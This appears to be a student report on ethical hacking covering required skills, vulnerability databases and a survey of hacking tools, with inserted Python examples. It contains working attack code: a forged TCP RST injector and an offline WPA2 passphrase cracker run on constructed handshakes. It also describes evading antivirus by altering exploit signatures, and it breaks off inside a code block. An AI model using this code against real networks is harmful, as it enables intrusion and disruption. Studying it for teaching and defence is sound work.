
Chapter-I

INTRODUCTION
1.1 OBJECTIVE:

Ethical hacking offers an objective analysis of an organization's information security posture, whatever
the organization's level of security expertise. It is useful to many organizations because it gives a clear
picture of the tools attackers use and of how those tools are deployed. Security professionals and ordinary
users must be trained before using hacking tools, and management benefits when the tools are applied in a
controlled way; the process of putting such tools to work is what this study sets out to explain. Network and
data security engineers will learn about the ethical hacking methods and techniques currently available, and
the concepts presented here provide knowledge that supports concrete security improvements. Business
users can apply the same techniques to their own data in order to verify that a process is correctly secured.
Many organizations now engage ethical hacking professionals so that their business operations stay
protected. Email systems, databases and communication applications can be tested with these tools so that
attacks are prevented or at least detected, and malicious attacks on information or software can be reduced
by applying the approach described in this study.

1.2 PROBLEM STATEMENT:

With more and more companies entering the e-commerce ecosystem and adopting new technologies
such as cloud computing, the threat of security breaches clearly demands efficient information security
systems. The rising threat from cyber attacks has also exposed a severe shortage of talent in this sector.

1.3 WHAT IS CYBER-SECURITY ?

Cyber security has never been simple, and because attacks evolve every day as attackers become more
inventive, it is critical to define cyber security properly and to identify what constitutes good cyber
security.

Why is this so important? Because year over year, worldwide spending on cyber security continues to
grow: USD 71.1 billion in 2014 (up 7.9% on 2013), USD 75 billion in 2015 (up 4.7% on 2014), and an
expected USD 101 billion by 2018. Organizations are starting to understand that malware is a publicly
available commodity that makes it easy for anyone to become a cyber attacker, and that many
companies offer security solutions that do little to defend against attacks. Cyber security demands
focus and dedication.
Page 1 of 38

Cyber security protects the data and integrity of computing assets belonging to or connecting to an
organization’s network. Its purpose is to defend those assets against all threat actors throughout the
entire life cycle of a cyber attack.

Kill chains, zero-day attacks, ransomware, alert fatigue and budgetary constraints are just a few of
the challenges that cyber security professionals face. Cyber security experts need a stronger
understanding of these topics and many others, to be able to confront those challenges more
effectively.

1.4 APPLICATIONS OF ETHICAL HACKING

 To build computer systems that prevent unauthorised access and safeguard systems and
information from malicious attack.
 To manage adequate preventive measures in order to avoid security breaches.
 To safeguard user or customer information handled in business transactions and visits.
 To test networks at regular intervals.
 To create security awareness at all levels of a business.

Chapter-II

SYSTEM ANALYSIS

2.1 LITERATURE SURVEY:

Ethical hacking is a way of objectively analysing an organisation's information security posture. A new
league of IT professionals, called white hat hackers or ethical hackers, is emerging and gaining
prominence. The job of an ethical hacker is to deliberately penetrate security systems, find the weak
points and help fix them.
These professionals employ methods similar to those used by malicious hackers, but they are required
to stay a step or two ahead of their malicious counterparts. Ethical or white hat hackers may be employed
by governments, banks or private firms to prevent cyber crime. They hack the system with the
permission of the client and present a maturity scorecard for the network that highlights its overall
risk.
Penetration testing, or pen testing, is a way of evaluating how vulnerable Internet applications, networks
and computer systems are. Such a test gauges the network against a real-world attack and gives it a
realistic assessment.

2.2 Ethical hacking includes services like the following:

 Application testing: uncovers flaws in an application at its core, or logical, level
 Remote or war dialing: finds modems that accept unauthenticated dial-in connections into the
network
 Local network testing: covers services, protocols, network devices and virtual private networks
 Wireless security: measures the level of security of the wireless infrastructure as a whole
 System hardening: strengthens the host and fixes its weaknesses
 Stolen laptop: uses the PC of an important employee to check for passwords and personal
information stored, for example, in dial-up or VPN software
 Social engineering: the hardest kind of test to carry out, because it involves people, personalities
and employees rather than systems

2.3 THE NEED FOR ETHICAL HACKERS:

Cyber crime is becoming more common and attackers more sophisticated, with rogue nation-states
and terrorist organisations funding criminals to breach networks, either to extort hefty ransoms or to
compromise national security.
Businesses face the challenge of complex security requirements that must be updated as hacking
tactics change, of hidden vulnerabilities, and of evolving technologies. Ethical hacking firms with
specially trained professionals come to the rescue of businesses while ensuring effective service and
confidentiality.
While many new businesses are better prepared for cyber attacks, traditional businesses still lack a
proactive understanding of the need for ethical hacking. For example, in India, banks that have
repeatedly borne the brunt of attacks are hiring professional help to secure their networks. Still, their
investment in infrastructure against cybercrime is minuscule compared to that of banks in the US.
Hotels and other service industries seem to be lagging behind. Recently, many hotels in the country
were attacked by the DarkHotel malware, which spies on corporate travellers by gaining access through
the hotel's Wi-Fi service.
With new worms, malware, ransomware and viruses springing up every day, there is a need to create
more awareness among businesses of how ethical hacking can help them safeguard their networks.
Ethical hacking as a career offers immense opportunities. A freshly certified ethical hacker could attract
a salary of between INR 3.5 and 4 lakh per year. Experienced professionals in this field, such as
security consultants, information security analysts and ethical hacking experts, can command salaries
in the range of INR 9 to INR 20 lakh.

2.4 The Essential Skills for an Ethical Hacker:

Because hacking is among the most demanding information technology disciplines, it requires broad
knowledge of IT technologies and techniques.

2.4.1 The Fundamental Skills:

These are the basics every hacker should know before even trying to hack. Once you have a good grasp
of everything in this section, you can move on to the intermediate level.
1.Basic Computer Skills:

It probably goes without saying that to become a hacker you need some basic computer skills. These skills go
beyond the ability to create a Word document or browse the Internet. You need to be able to use the
command line in Windows, edit the registry, and set up your networking parameters.

Many of these basic skills can be acquired in a basic computer skills course such as CompTIA A+.

2.Networking Skills:

You need to understand the basics of networking, such as:

 DHCP
 NAT
 Subnetting
 IPv4
 IPv6
 Public vs. private IP addresses
 DNS
 Routers and switches
 VLANs
 The OSI model
 MAC addressing
 ARP

Because we are often exploiting these technologies, the better you understand how they work, the more
successful you will be.

3.Virtualization:

You need to become proficient in one of the virtualization packages such as VirtualBox or VMware
Workstation. Ideally you want a safe environment in which to practise your hacks before you take them into
the real world, and a virtual lab lets you test and refine them before going live.

4.Security Concepts & Technologies:

A good hacker understands security concepts and technologies: the only way to get past the roadblocks
set up by security admins is to be familiar with them. The hacker must understand such things as PKI
(public key infrastructure), SSL/TLS, IDS (intrusion detection systems), firewalls, etc.

A beginner can acquire many of these skills in a basic security course such as CompTIA Security+.

5.Wireless Technologies:

To hack wireless networks you must first understand how they work: the security protocols (WEP, WPA,
WPA2) and the ciphers they use, the four-way handshake, and WPS. You also need to understand the
protocol used for connection and authentication, and the legal constraints on wireless testing.

2.4.2 The Intermediate Skills:

This is where things get interesting, and where you really start to get a feel for your capabilities as a hacker.
Knowing all of these will allow you to advance to more intuitive hacks where you are calling all the shots—
not some other hacker.

1.Scripting

Without scripting skills, a hacker is relegated to using other hackers' tools, which limits your
effectiveness: every tool loses effectiveness over time as security admins come up with defenses against it.

To develop your own tools, you will need to become proficient in at least one scripting language,
including the BASH shell, plus one of Perl, Python or Ruby.

2.Advanced TCP/IP

A beginner must understand TCP/IP basics, but to reach the intermediate level you must understand the
TCP/IP protocol stack and its fields in intimate detail. This includes how each field in the TCP and IP
headers (the TCP flags, window, sequence and acknowledgement numbers, the IP DF bit, TOS, etc.) can be
manipulated and used against a victim system, for example to inject forged packets during a
man-in-the-middle (MitM) attack.
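The header fields listed above are easiest to understand in code. The following Python is an added example and is not part of the original report: it builds a constructed IPv4/TCP SYN (addresses, ports and sequence numbers are made up), parses both headers (flags, window, DF bit, TOS, sequence and acknowledgement numbers), verifies the RFC 1071 checksums, and shows the kind of manipulation the text refers to by forging the RST segment an on-path attacker would inject to tear the connection down.

```python
import struct

def ones_complement_sum(data: bytes) -> int:
    """RFC 1071: ones'-complement of the ones'-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def ip_to_bytes(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))

def build_ipv4(src, dst, payload_len, tos=0, ident=0x1234, df=True, ttl=64, proto=6):
    """20-byte IPv4 header; DF is bit 14 of the flags/fragment-offset word (MF would be 0x2000)."""
    flags_frag = 0x4000 if df else 0
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 20 + payload_len, ident, flags_frag,
                      ttl, proto, 0, ip_to_bytes(src), ip_to_bytes(dst))
    return hdr[:10] + struct.pack("!H", ones_complement_sum(hdr)) + hdr[12:]

def tcp_checksum(src, dst, segment):
    """The TCP checksum covers a pseudo-header (addresses, protocol, length) plus the segment."""
    pseudo = ip_to_bytes(src) + ip_to_bytes(dst) + struct.pack("!BBH", 0, 6, len(segment))
    return ones_complement_sum(pseudo + segment)

def build_tcp(src, dst, sport, dport, seq, ack, flags, window=65535, payload=b""):
    seg = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0) + payload
    return seg[:16] + struct.pack("!H", tcp_checksum(src, dst, seg)) + seg[18:]

TCP_FLAGS = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]  # bit 0 .. bit 7

def parse_ipv4(pkt: bytes) -> dict:
    ver_ihl, tos, total_len, ident, ff, ttl, proto, _csum = struct.unpack("!BBHHHBBH", pkt[:12])
    ihl = (ver_ihl & 0x0F) * 4
    return {"version": ver_ihl >> 4, "tos": tos, "total_len": total_len, "id": ident,
            "df": bool(ff & 0x4000), "mf": bool(ff & 0x2000), "frag_offset": ff & 0x1FFF,
            "ttl": ttl, "proto": proto,
            "src": ".".join(map(str, pkt[12:16])), "dst": ".".join(map(str, pkt[16:20])),
            # a header whose checksum field is correct sums to zero in ones' complement
            "checksum_ok": ones_complement_sum(pkt[:ihl]) == 0,
            "payload": pkt[ihl:total_len]}

def parse_tcp(seg: bytes, src: str, dst: str) -> dict:
    sport, dport, seq, ack, off, flags, window, _csum, urg = struct.unpack("!HHIIBBHHH", seg[:20])
    data_off = (off >> 4) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": [name for bit, name in enumerate(TCP_FLAGS) if flags & (1 << bit)],
            "window": window, "urgent": urg,
            "checksum_ok": tcp_checksum(src, dst, seg) == 0,
            "payload": seg[data_off:]}

def analyse(pkt: bytes):
    ip = parse_ipv4(pkt)
    return ip, parse_tcp(ip["payload"], ip["src"], ip["dst"])

def forge_rst(ip: dict, tcp: dict) -> bytes:
    """The RST an on-path attacker injects to kill the observed connection: addresses and ports
    swapped, SEQ set to the ACK number the peer expects next so that the victim accepts it."""
    return (build_ipv4(ip["dst"], ip["src"], 20)
            + build_tcp(ip["dst"], ip["src"], tcp["dport"], tcp["sport"],
                        seq=tcp["ack"], ack=0, flags=0x04))

# Constructed sample: a SYN from 10.0.0.5:40000 to 10.0.0.9:80 with TOS 0x10 (made-up values)
SAMPLE_PACKET = (build_ipv4("10.0.0.5", "10.0.0.9", 20, tos=0x10)
                 + build_tcp("10.0.0.5", "10.0.0.9", 40000, 80, seq=0x11223344, ack=0, flags=0x02))

if __name__ == "__main__":
    ip, tcp = analyse(SAMPLE_PACKET)
    print(ip)
    print(tcp)
    print(analyse(forge_rst(ip, tcp))[1]["flags"])
```

Flipping any byte of the sample header (say the TTL at offset 8) makes `checksum_ok` false, which is why a packet-crafting tool has to recompute both checksums after every field it tampers with; the forged RST is only accepted by the victim's stack because its SEQ lands inside the receive window that the observed ACK reveals.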

3.Cryptography

Although one does not need to be a cryptographer to be a good hacker, the better you understand the
strengths and weaknesses of each cryptographic algorithm, the better your chances of defeating it. In
addition, cryptography can be used by the hacker to hide their activities and evade detection.

4.Reverse Engineering

Reverse engineering lets you open a piece of malware and rebuild it with additional features and
capabilities. Just as in software engineering, no one builds a new application from scratch: nearly every
new exploit or piece of malware reuses components from existing malware.

Reverse engineering also lets the hacker take an existing exploit and change its signature so that it
slips past IDS and AV detection.

2.4.3 Intangible Skills:

Along with all these computer skills, the successful hacker must have some intangible skills. These include
the following.

1.Think Creatively

There is ALWAYS a way to hack a system and many ways to accomplish it. A good hacker can think creatively
of multiple approaches to the same hack.

2.Problem-Solving Skills

A hacker is always coming up against seemingly unsolvable problems. This requires that the hacker be
accustomed to thinking analytically and solving problems. This often demands that the hacker diagnose
accurately what is wrong and then break the problem down into separate components. This is one of those
abilities that comes with many hours of practice.

3.Persistence

A hacker must be persistent. If you fail at first, try again; if that fails, come up with a new approach and
try again. Only with persistence will you be able to hack the most secure systems.

2.5 CONCLUSION:

The security of an enterprise should be analysed for effectiveness from time to time. Since businesses
operate in a structured yet complex environment of security policies and changing technologies, with
many interactions and interdependencies, the system needs to be assessed holistically. Ethical hacking
is possibly the best way of examining such systems and closing the minor gaps that could otherwise
lead to compromise of the entire organization.

Chapter-III

ANALYSIS

INTRODUCTION:

SOFTWARE REQUIREMENTS SPECIFICATION:

Operating System : Kali Linux, Parrot Security OS, BackBox Linux, BlackArch Linux, etc.
Attack frameworks and scripts : TheFatRat, Wifite, airgeddon, etc.
Password cracking tools : John the Ripper, Hashcat, etc.
Web server : Apache2.
Virtual machines : VMware Workstation or VirtualBox.
Hacking tools : see the tool survey later in this chapter.

SYSTEM REQUIREMENTS:

RAM : 8 GB or more
Kali Linux guest, minimum memory : 512 MB / 1 GB or more
Metasploitable guest, minimum memory : 256 MB / 512 MB or more
Windows guest, minimum memory : 512 MB or more
Processor : Intel Core i5 or above, at least 2.20 GHz
HDD : as required by the guests
Graphics card : 4 GB of video memory (a lot of GPU power is needed when brute-forcing password hashes)
Exploit Databases for Finding Vulnerabilities:

Hundreds of Windows 10, macOS and Linux vulnerabilities are disclosed every week, many of which escape
mainstream attention. Most users are not even aware that newly found vulnerabilities and exploits exist,
or that anyone can look up the corresponding CVEs in a few clicks on a handful of websites.

What Is a CVE?

The numbered reference system used to catalog publicly disclosed vulnerabilities is called the Common
Vulnerabilities and Exposures (CVE) system. A CVE entry (for example CVE-2018-15473) identifies one
vulnerability; it does not itself contain an exploit, although exploit databases are usually indexed by CVE.

Public exploits for known CVEs are sought after by black hats and security professionals alike. They can be
used to break into outdated Windows versions, perform privilege escalation, and gain access to routers
without the owner's knowledge, among other things.

1.CIRCL:

The Computer Incident Response Center Luxembourg (CIRCL) is an information security organization
that handles cyber threat detection and incident response. Its website features security research
publications and a searchable CVE database.

2.VulDB:

For decades, the VulDB specialists have coordinated with large and independent information security
communities to compile a searchable database of over 124,000 CVEs. Hundreds of new entries are added
every day and scored (low, medium, high, etc.) according to the severity of the disclosed vulnerability.

3.SecurityFocus:

SecurityFocus has reported on cybersecurity incidents and published whitepapers in the past. These
days it tracks software bug reports and has been compiling a searchable archive of CVEs since 1999.

4.0day.today:

0day.today (accessible via tor onion service), is an exploit database that also sells private exploits
for as much as $5,000 USD. While there are several reports of scams occurring with private sales,
the searchable public database is quite legitimate.
5.Rapid7:

Rapid7, creators of the Metasploit Framework, maintain a searchable vulnerability database on their
website. Unlike other databases, Rapid7 rarely publishes the actual exploit code. Instead it offers
advisories with reference links to relevant documentation for remediation, as well as links to the
msfconsole modules that automate the indexed exploit.

For example, since the public disclosure of CVE-2018-15473 (an OpenSSH username enumeration flaw),
the corresponding module can be found in msfconsole and run with very little effort.

6.NIST:

The National Institute of Standards and Technology (NIST) is one of the oldest physical science
laboratories in the United States. It is currently involved in a myriad of technologies and research
programs, including the National Initiative for Cybersecurity Education, the National Vulnerability
Database (NVD), which enriches CVE entries with severity scores and affected-product data, technology
news, and a quantum information science program. Anyone can search the NVD.

7.Packet Storm Security:

Packet Storm Security isn't exactly intended to be a searchable database of exploits. Rather, it's a
general resource of information pertaining to vulnerability advisories and remediations. The Packet
Storm website also features hacker news, research whitepapers, and a feed of recently disclosed
CVEs.

8.Exploit Database:

The Exploit Database is maintained by Offensive Security, which specializes in advanced Windows
exploitation, web application security, and several well-known penetration tester certifications.

Its searchable database currently holds over 40,000 remote, local, web application and
denial-of-service exploits, together with the Google Hacking Database and research whitepapers.

9.Vulners:

Vulners, founded by Kir Ermakov, is a CVE database currently containing over 176,500 indexed
exploits. Its website includes CVE statistics, a Linux vulnerability management auditor, and
searchable CVE database.

10.MITRE:

MITRE is a US not-for-profit organization that operates federally funded research and development
centers (FFRDCs). Its website emphasizes publications and information related to its FFRDCs, such as
the National Cybersecurity FFRDC. MITRE also runs the CVE program itself, so its CVE list is the
canonical, publicly searchable registry that the other databases above reference.

Operating System Advisory & CVE Databases (Bonus):

Some readers may want to explore recent OS-specific vulnerabilities, or simply stay aware in order to
protect themselves. Most operating system distributions publish an advisory listing on their website.
These are mostly application-specific vulnerabilities and bugs, but in many cases they can be exploited
easily by attackers.

Microsoft: Windows Security Update Guide

Android: Monthly Security Bulletin

Apple: Security Updates

Ubuntu: Security Notices, CVE Tracker, Mailing List

Debian: Recent Advisories, Mailing List

Red Hat: CVE Database, Security Advisories

Arch Linux: Security Advisories

What are Hacking Tools?

Hacking tools are programs and scripts that help you find and exploit weaknesses in computer systems,
web applications, servers and networks. A variety of such tools is available; some are open source,
others are commercial products.

The following survey highlights popular tools for the ethical hacking of web applications, servers and
networks.

1) Netsparker:

Netsparker is an easy-to-use web application security scanner that automatically finds SQL injection,
XSS and other vulnerabilities in web applications and web services. It is available on-premises and as
a SaaS solution.

Features:

 Accurate vulnerability detection with its Proof-Based Scanning technology, which confirms a finding
by safely exploiting it rather than reporting a suspicion
 Minimal configuration required: the scanner automatically detects URL rewrite rules and custom 404
error pages
 REST API for integration with the SDLC, bug-tracking systems, etc.
 Scalable: according to the vendor, 1,000 web applications can be scanned in 24 hours

2) Acunetix:

Acunetix is a fully automated web vulnerability scanner that mimics an attacker in order to stay one
step ahead of malicious intruders. It accurately scans HTML5, JavaScript and single-page applications,
can audit complex authenticated web apps, and issues compliance and management reports on a wide
range of web and network vulnerabilities.

Features:

 Scans for all variants of SQL injection, XSS and 4,500+ additional vulnerabilities
 Detects over 1,200 WordPress core, theme and plugin vulnerabilities
 Fast and scalable: crawls hundreds of thousands of pages without interruption
 Integrates with popular WAFs and issue trackers to support the SDLC
 Available on-premises and as a cloud solution

3) Probely:

Probely (probe.ly) continuously scans web applications for vulnerabilities. It lets customers manage the
life cycle of each vulnerability and gives guidance on how to fix it. Probely is a security tool built with
developers in mind.

Features:

 Scans for SQL injection, XSS, the OWASP Top 10 and over 5,000 vulnerabilities, including 1,000
WordPress and Joomla vulnerabilities
 Full API: every feature of Probely is also available through an API
 Integration with CI tools, Slack and Jira
 Unlimited team members
 PDF reports to document your security posture
 Diverse scanning profiles, ranging from safe to aggressive scans
 Multiple environment targets: production (non-intrusive scans) and testing (intrusive, complete
scans)

4) Burp Suite:

Burp Suite is a platform for security testing of web applications. Its tools work together to support the
entire pen testing process, from initial mapping and analysis of an application's attack surface to
finding and exploiting vulnerabilities.

Features:

 An intercepting proxy that lets the tester view and modify all traffic between the browser and the
target application
 Scanner (Professional edition) for automated detection of vulnerabilities such as SQL injection and XSS
 Intruder for customised automated attacks such as fuzzing and credential brute-forcing
 Repeater for manually modifying and re-sending individual requests
 Sequencer for analysing the randomness of session tokens
 Extensible through the BApp Store and an extension API (Java, Python via Jython, Ruby via JRuby)
 Available as a free Community Edition and as paid Professional and Enterprise editions

5) Ettercap:

Ettercap is a suite for man-in-the-middle attacks on a LAN. It supports active and passive dissection of
many protocols and includes features for network and host analysis.

Features:

 Active and passive dissection of many protocols
 ARP poisoning to sniff on a switched LAN between two hosts
 Characters can be injected into a server or client while maintaining a live connection
 Sniffing of SSH1 connections in full duplex (SSH2 is not affected)
 Sniffing of HTTPS data by presenting a forged certificate, even when the connection is made through
a proxy (the victim's browser warns about the certificate)
 Custom plugins through Ettercap's API
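The ARP poisoning feature above is also the easiest Ettercap activity to detect, and the same check covers the ARP entry in the networking skills list in Chapter II. The Python below is an added example, not Ettercap code or part of the original report: it runs over a constructed list of ARP replies (made-up addresses: a gateway at 192.168.1.1 and a poisoner with MAC de:ad:be:ef:00:01) and flags an IP whose MAC changes, a MAC that claims several IPs, and any reply contradicting a static binding. Tools such as arpwatch and switch-side Dynamic ARP Inspection apply the same logic in production.

```python
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ArpReply:
    ts: float          # capture timestamp (seconds)
    sender_ip: str     # "I am sender_ip ..."
    sender_mac: str    # "... and my MAC is sender_mac"
    target_ip: str

GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:55"

# Constructed capture: three legitimate replies, then a host with MAC de:ad:be:ef:00:01
# poisoning both the gateway and 192.168.1.10, which is exactly what an ARP MitM produces.
SAMPLE_REPLIES = [
    ArpReply(0.0, "192.168.1.1", GATEWAY_MAC, "192.168.1.10"),
    ArpReply(0.5, "192.168.1.10", "00:aa:bb:cc:dd:01", "192.168.1.1"),
    ArpReply(1.0, "192.168.1.20", "00:aa:bb:cc:dd:02", "192.168.1.1"),
    ArpReply(5.0, "192.168.1.1", "de:ad:be:ef:00:01", "192.168.1.10"),
    ArpReply(5.0, "192.168.1.10", "de:ad:be:ef:00:01", "192.168.1.1"),
    ArpReply(5.2, "192.168.1.1", "de:ad:be:ef:00:01", "192.168.1.10"),
]

def detect_arp_spoofing(replies, static_bindings=None):
    """Return alerts as (timestamp, kind, details...) tuples.
    Rules: (1) a reply contradicts a static binding, (2) an IP's MAC differs from the one first
    seen, (3) one MAC claims more than one IP (reported once per MAC)."""
    static = dict(static_bindings or {})
    ip_to_mac = dict(static)            # trusted bindings are never overwritten by later replies
    ips_by_mac = defaultdict(set)
    reported_multi = set()
    alerts = []
    for r in replies:
        known = ip_to_mac.get(r.sender_ip)
        if known is None:
            ip_to_mac[r.sender_ip] = r.sender_mac
        elif known != r.sender_mac:
            kind = "static-binding-violation" if r.sender_ip in static else "mac-changed"
            alerts.append((r.ts, kind, r.sender_ip, known, r.sender_mac))
        ips_by_mac[r.sender_mac].add(r.sender_ip)
        if len(ips_by_mac[r.sender_mac]) > 1 and r.sender_mac not in reported_multi:
            reported_multi.add(r.sender_mac)
            alerts.append((r.ts, "mac-claims-multiple-ips", r.sender_mac,
                           tuple(sorted(ips_by_mac[r.sender_mac]))))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, {GATEWAY_IP: GATEWAY_MAC}):
        print(alert)
```

Rule 3 on its own is a weak signal (a router or a host with several addresses legitimately answers for more than one IP), so in practice it is combined with an allowlist; rule 1 is the strong one, which is why pinning the gateway's MAC statically on critical hosts is a cheap mitigation.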

6) Aircrack-ng:

Aircrack-ng is a widely trusted suite for auditing Wi-Fi networks. It captures 802.11 frames
(airodump-ng), injects and replays frames (aireplay-ng), and recovers WEP keys and WPA/WPA2-PSK
passphrases (aircrack-ng), the latter by a dictionary attack against a captured four-way handshake.

Features:

 More cards and drivers supported
 Support for all major operating systems and platforms
 New WEP attack: PTW
 Support for WEP dictionary attacks
 Support for the fragmentation attack
 Improved cracking speed
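Both the wireless skills section in Chapter II and the Aircrack-ng entry above rely on the same mechanism: a WPA/WPA2-PSK passphrase is recovered from a captured four-way handshake by recomputing the handshake MIC for each dictionary word. The Python below is an added example, not Aircrack-ng code or part of the original report. It implements the IEEE 802.11i derivation (PBKDF2-SHA1 for the PMK, the PRF-512 for the PTK, HMAC-SHA1 for the WPA2 MIC). The handshake itself is constructed in the script from the passphrase "correct horse" with made-up MACs and nonces, so that the cracker has something to recover offline.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK/PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step and is what rate-limits a dictionary attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenated HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]

def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)

MIC_OFFSET = 81  # 802.1X header (4) + descriptor type, key info, key length, replay counter,
                 # nonce, IV, RSC, ID (77 bytes) -> the 16-byte Key MIC field

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def check_passphrase(hs: dict, candidate: str) -> bool:
    pmk = derive_pmk(candidate, hs["ssid"])
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    kck = ptk[:16]  # the first 128 bits of the PTK are the Key Confirmation Key
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])

def crack(hs: dict, wordlist):
    """Offline dictionary attack: everything needed was sniffed from the air."""
    for word in wordlist:
        if check_passphrase(hs, word):
            return word
    return None

def make_capture(passphrase: str, ssid: str = "TestNet") -> dict:
    """Constructed stand-in for a sniffed handshake (made-up MACs and nonces). Message 2 of the
    four-way handshake is assembled and its MIC computed with the real passphrase, which is then
    discarded; only what a sniffer would see is returned."""
    ap_mac, client_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = (bytes.fromhex("0203005f")                           # 802.1X v2, EAPOL-Key, length 95
             + b"\x02" + bytes.fromhex("010a") + bytes.fromhex("0010")  # RSN descriptor, key info, key len
             + bytes(8) + snonce + bytes(16) + bytes(8) + bytes(8)     # replay ctr, SNonce, IV, RSC, ID
             + bytes(16) + bytes(2))                                    # MIC (zero), key data length 0
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}

SAMPLE_HANDSHAKE = make_capture("correct horse")
SAMPLE_WORDLIST = ["password", "letmein", "correct horse", "battery staple"]

if __name__ == "__main__":
    print(crack(SAMPLE_HANDSHAKE, SAMPLE_WORDLIST))   # -> correct horse
```

The PMK depends only on the passphrase and SSID, which is why precomputed tables are per-SSID and why a long, non-dictionary passphrase (or WPA3's SAE handshake, which removes the offline check entirely) is the real defence: with the handshake in hand, the attacker is limited only by how fast they can run PBKDF2.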

7) Angry IP Scanner:

Angry IP Scanner is an open-source, cross-platform network scanner. It scans IP addresses and ports.

Features:

 Scans local networks as well as the Internet
 Free and open-source tool
 Targets can be an IP range, a random set, or read from a file in any format
 Exports results in many formats
 Extensible with many data fetchers
 Provides a command-line interface
 Works on Windows, Mac and Linux
 No installation needed

8) GFI LanGuard:

GFI LanGuard is a network security scanner that scans networks for vulnerabilities. It can act as an
on-demand 'virtual security consultant' and builds an asset inventory of every device.

Features:

 Change tracking: maintaining a secure network over time means knowing which changes are
affecting it
 Patch management: fix vulnerabilities before an attack
 Central analysis of the whole network
 Early discovery of security threats
 Lower cost of ownership by centralising vulnerability scanning
 Help in maintaining a secure and compliant network

9) Savvius:

Savvius Omnipeek is a network analysis and forensics product. It diagnoses performance issues and
reduces security risk through deep packet-level visibility, and resolves network issues faster with
Savvius packet intelligence.

Features:

 Powerful, easy-to-use network forensics software
 Automated capture of the network data needed to investigate security alerts quickly
 Available as software and as integrated appliances
 Packet intelligence combined with deep analysis
 Rapid resolution of network and security issues
 Intuitive workflow
 Responsive technical support and onsite deployment for appliances

10) QualysGuard:

QualysGuard (now the Qualys Cloud Platform) helps businesses streamline their security and compliance
programs and build security into their digital transformation initiatives. It can also scan cloud-hosted
systems for vulnerabilities.

Features:

 Trusted globally
 No hardware to buy or manage
 A scalable, end-to-end solution for all aspects of IT security
 Vulnerability data securely stored and processed on an n-tier architecture of load-balanced servers
 Sensors provide continuous visibility
 Data analysed in real time
 Threats can be responded to in real time

11) WebInspect:

Fortify WebInspect is an automated dynamic application security testing (DAST) tool that supports
ethical hacking techniques. It provides comprehensive dynamic analysis of complex web applications and
services.

Features:

 Tests the dynamic behaviour of running web applications to identify security vulnerabilities
 Keeps you in control of the scan with relevant information and statistics at a glance
 Centralised program management
 Simultaneous crawl-and-audit technology brings professional-level testing within reach of novice
security testers
 Easily informs management about vulnerability trends, compliance management and risk oversight

12) Hashcat:

Hashcat is a robust password-cracking tool. It helps users recover lost passwords, audit password
security, or simply find out which plaintext a hash corresponds to.

Features:

 Open-source platform
 Multi-platform support
 Multiple devices in the same system can be used
 Mixed device types (CPUs and GPUs) in the same system
 Supports distributed cracking networks
 Supports interactive pause/resume
 Supports sessions and restore
 Built-in benchmarking system
 Integrated thermal watchdog
 Supports automatic performance tuning

13) L0phtCrack:

L0phtCrack 6 is a password audit and recovery tool. It identifies and assesses password weaknesses on
local machines and across networks.

Features:

 Multicore and multi-GPU support to make the most of the hardware
 Easy to customise
 Simple password loading
 Scheduling of sophisticated tasks for automated enterprise-wide password audits
 Fixes weak passwords by forcing password resets or locking accounts
 Audits multiple operating systems

14) RainbowCrack:

RainbowCrack is a password-cracking tool widely used in ethical hacking. It cracks hashes with rainbow
tables, using a time-memory trade-off: chains of hash-and-reduce operations are precomputed once and
only their endpoints are stored, so that each later lookup costs far less than a fresh brute-force search.

Features:

 Full time-memory trade-off tool suite, including rainbow table generation
 Supports rainbow tables for any hash algorithm
 Supports rainbow tables for any character set
 Supports rainbow tables in raw file format (.rt) and compact file format
 Computation on multi-core processors
 GPU acceleration with multiple GPUs
 Runs on Windows and Linux
 Unified rainbow table file format on every supported OS
 Command-line user interface
 Graphical user interface
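The time-memory trade-off behind RainbowCrack is worth seeing in code. The Python below is an added example, not RainbowCrack code or part of the original report: it generates a small rainbow table for four-letter lowercase MD5 passwords with a column-dependent reduction function, then looks up a hash by regenerating the chain it falls in. The keyspace, chain count and chain length are toy values chosen so that the script runs in well under a second; a real table uses millions of much longer chains.

```python
import hashlib
import string

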